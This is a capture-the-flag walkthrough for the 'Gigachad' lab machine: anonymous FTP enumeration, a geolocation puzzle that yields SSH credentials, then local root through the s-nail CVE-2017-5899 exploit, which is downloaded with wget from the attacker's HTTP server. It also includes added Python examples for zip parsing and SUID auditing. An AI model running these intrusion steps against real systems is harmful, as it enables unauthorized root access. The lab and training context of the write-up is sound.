Gigachad
Information Gathering
┌──(root㉿kali)-[/home/kali]
└─# nmap 192.168.214.85
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-16 07:42 EDT
Nmap scan report for 192.168.214.85
Host is up (0.00011s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:73:76:3D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 13.22 seconds
┌──(root㉿kali)-[/home/kali]
└─# nmap 192.168.214.85 -p 21 -sC
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-16 07:43 EDT
Nmap scan report for bogon (192.168.214.85)
Host is up (0.00024s latency).
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x 1 1000 1000 297 Feb 07 2021 chadinfo
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.214.76
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
MAC Address: 08:00:27:73:76:3D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 9.77 seconds
Target IP: 192.168.214.85
FTP allows anonymous login.
┌──(root㉿kali)-[/home/kali]
└─# lftp 192.168.214.85 -u anonymous
Password:
lftp anonymous@192.168.214.85:~> ls -al
dr-xr-xr-x 2 1000 1000 4096 Feb 07 2021 .
dr-xr-xr-x 2 1000 1000 4096 Feb 07 2021 ..
-r-xr-xr-x 1 1000 1000 297 Feb 07 2021 chadinfo
lftp anonymous@192.168.214.85:/> get chadinfo
297 bytes transferred
lftp anonymous@192.168.214.85:/> exit
Running file on it shows it is a zip archive.
┌──(root㉿kali)-[/home/kali]
└─# file chadinfo
chadinfo: Zip archive data, at least v1.0 to extract, compression method=store
Since the archive uses compression method=store (the member is not compressed), its contents can be read directly with cat:
┌──(root㉿kali)-[/home/kali]
└─# cat chadinfo
PK
0HR��??chadinfoUT �j `Zj `uxwhy yes,
#######################
username is chad
???????????????????????
password?
!!!!!!!!!!!!!!!!!!!!!!!
go to /drippinchad.png
PK
0HR��??��chadinfoUT�j `uxPKN�
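As an added example (not code from the original write-up), here is a small Python parser for zip local file headers that shows why cat could read chadinfo: the method field is 0 (stored), so the member bytes sit uncompressed right after the header, between the "PK" signature and the central directory. The archive is constructed in memory with zipfile, and its member text is an assumption that only mimics the page's file.

```python
import io
import struct
import zipfile

LOCAL_HEADER_SIG = b"PK\x03\x04"  # the "PK" visible at the top of `cat chadinfo`
METHOD_STORED = 0                  # `file` reported "compression method=store"


def build_sample_archive() -> bytes:
    """Build a one-member stored zip in memory.

    Constructed sample: the member text only mimics the page's chadinfo file.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_STORED) as zf:
        zf.writestr(
            "chadinfo",
            "why yes,\nusername is chad\npassword?\ngo to /drippinchad.png\n",
        )
    return buf.getvalue()


def parse_local_headers(data: bytes) -> list:
    """Walk the local file headers (PKZIP APPNOTE 4.3.7) from the archive start.

    Returns one dict per member with its name, compression method, declared
    uncompressed size and the raw bytes that follow the header.
    """
    entries = []
    pos = 0
    while data.startswith(LOCAL_HEADER_SIG, pos):
        # 26 little-endian bytes after the 4-byte signature: version, flags,
        # method, mod time, mod date, crc32, compressed size, uncompressed
        # size, file name length, extra field length.
        (_version, _flags, method, _mtime, _mdate, _crc, csize, usize,
         name_len, extra_len) = struct.unpack_from("<HHHHHIIIHH", data, pos + 4)
        name_start = pos + 30
        name = data[name_start:name_start + name_len].decode("utf-8")
        payload_start = name_start + name_len + extra_len
        payload = data[payload_start:payload_start + csize]
        entries.append({"name": name, "method": method,
                        "size": usize, "payload": payload})
        pos = payload_start + csize   # next header, or the central directory
    return entries


def stored_text(data: bytes) -> dict:
    """Return {name: text} for stored members; deflated ones are not readable raw."""
    result = {}
    for e in parse_local_headers(data):
        if e["method"] == METHOD_STORED:
            result[e["name"]] = e["payload"].decode("utf-8")
    return result


def matches_zipfile(data: bytes) -> bool:
    """Cross-check the hand parser against the standard library's extraction."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return all(zf.read(e["name"]) == e["payload"]
                   for e in parse_local_headers(data))


if __name__ == "__main__":
    archive = build_sample_archive()
    for name, text in stored_text(archive).items():
        print(f"--- {name} (stored, readable without unzip) ---")
        print(text, end="")
    print("parser agrees with zipfile:", matches_zipfile(archive))
```

The same parser run over a deflated archive would return method 8 and an unreadable payload, which is the check to make before assuming that strings or cat will show an archive's contents.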
We get a username, chad, and a PNG path. Next, open the web page to view it.
I saved the file locally. At first I assumed it was image steganography, but after trying that it turned out not to be; putting it into Google reverse image search showed it was a geolocation puzzle, and the tower is the Maiden's Tower.
Looking it up on Wikipedia gives the English name maidenstower.
Since the initial scan of the target IP showed an SSH service, we connect next over SSH.
SSH into the target
User flag
chad@gigachad:~$ ls -al
total 20
drwxr-xr-x 4 chad chad 4096 Apr 16 06:58 .
drwxr-xr-x 3 root root 4096 Feb 7 2021 ..
dr-xr-xr-x 2 chad chad 4096 Feb 7 2021 ftp
drwx------ 3 chad chad 4096 Apr 16 06:58 .gnupg
-r-x------ 1 chad chad 32 Feb 7 2021 user.txt
chad@gigachad:~$ cat user.txt
0FAD8F4B099A26E004376EAB42B6A56Achad@gigachad:~$
Privilege Escalation
chad@gigachad:~$ find / -user root -perm -4000 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/s-nail/s-nail-privsep
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/chsh
There is an s-nail helper here (CVE-2017-5899). Searching for an exploit gives the following.
Then save the script on Kali and start an HTTP server on Kali.
┌──(root㉿kali)-[/home/kali/bash]
└─# searchsploit -m 47172
  Exploit: S-nail < 14.8.16 - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/47172
     Path: /usr/share/exploitdb/exploits/multiple/local/47172.sh
    Codes: CVE-2017-5899
 Verified: False
File Type: POSIX shell script, ASCII text executable
cp: overwrite '/home/kali/bash/47172.sh'? y
Copied to: /home/kali/bash/47172.sh
┌──(root㉿kali)-[/home/kali/bash]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.214.85 - - [16/Apr/2025 08:03:47] "GET /47172.sh HTTP/1.1" 200 -
On the target, use wget to fetch the 47172.sh script from Kali.
chad@gigachad:~$ wget 192.168.214.76/47172.sh
--2025-04-16 07:09:33-- http://192.168.214.76/47172.sh
Connecting to 192.168.214.76:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8479 (8.3K) [text/x-sh]
Saving to: ‘47172.sh.1’
47172.sh.1 100%[===================================>] 8.28K --.-KB/s in 0s
2025-04-16 07:09:33 (232 MB/s) - ‘47172.sh.1’ saved [8479/8479]
Because the script exploits a race condition, success depends partly on luck: with good luck it takes few runs, with bad luck many.
Root flag
It cannot be run by itself.
[.] Race #863 of 1000 ...
[+] got root! /var/tmp/.sh (uid=0 gid=0)
[.] Cleaning up...
[+] Success:
-rwsr-xr-x 1 root root 14424 Apr 16 07:12 /var/tmp/.sh
[.] Launching root shell: /var/tmp/.sh
# bash
root@gigachad:~# cd /root
root@gigachad:/root# ls
chad_real_identity.png root.txt
root@gigachad:/root# cat root.txt
832B123648707C6CD022DD9009AEF2FDroot@gigachad:/root#
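As an added defensive example (not from the write-up), the following Python audit reads a SUID-root listing like the one produced by find in the privilege-escalation step and flags two things: SUID-root files missing from an allowlist recorded at build time (here s-nail-privsep, which the page ties to CVE-2017-5899), and SUID-root files that are hidden or sit under scratch or home directories, which is exactly the /var/tmp/.sh artifact the exploit output reports. The baseline allowlist is an assumption (a stock Debian-style set), and the find listing is constructed from the page's output plus that artifact.

```python
from pathlib import PurePosixPath

# Assumed baseline: the SUID-root set recorded from a clean build of the same
# image. Not from the page; a stock Debian-style list used for illustration.
BASELINE_SUID = frozenset({
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/bin/passwd", "/usr/bin/mount", "/usr/bin/chfn", "/usr/bin/umount",
    "/usr/bin/newgrp", "/usr/bin/su", "/usr/bin/gpasswd", "/usr/bin/chsh",
})

# A root-owned SUID file under any of these trees is almost certainly planted.
SCRATCH_DIRS = ("/tmp", "/var/tmp", "/dev/shm", "/home")

# Constructed input: the page's `find / -user root -perm -4000` listing plus the
# /var/tmp/.sh file that the exploit output reports creating.
SAMPLE_FIND_OUTPUT = """\
/usr/lib/openssh/ssh-keysign
/usr/lib/s-nail/s-nail-privsep
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/chsh
/var/tmp/.sh
"""


def classify(path: str) -> str:
    """Return 'critical', 'review' or 'ok' for one SUID-root path."""
    p = PurePosixPath(path)
    in_scratch = any(PurePosixPath(d) in p.parents for d in SCRATCH_DIRS)
    if in_scratch or p.name.startswith("."):
        # SUID root in a scratch tree, or hidden: treat as a planted root shell.
        return "critical"
    if path not in BASELINE_SUID:
        # Legitimate-looking helper that is not in the baseline: check the
        # owning package's version against published advisories.
        return "review"
    return "ok"


def audit(find_output: str) -> dict:
    """Map every non-'ok' path in a find listing to its verdict."""
    findings = {}
    for line in find_output.splitlines():
        path = line.strip()
        if path:
            verdict = classify(path)
            if verdict != "ok":
                findings[path] = verdict
    return findings


if __name__ == "__main__":
    for path, verdict in sorted(audit(SAMPLE_FIND_OUTPUT).items()):
        print(f"{verdict:8} {path}")
```

On a real host the input would be the output of find / -user root -perm -4000 -type f 2>/dev/null, and the baseline would live in configuration management so that a new SUID helper or a stray file in /var/tmp shows up as a diff rather than as a surprise during incident response.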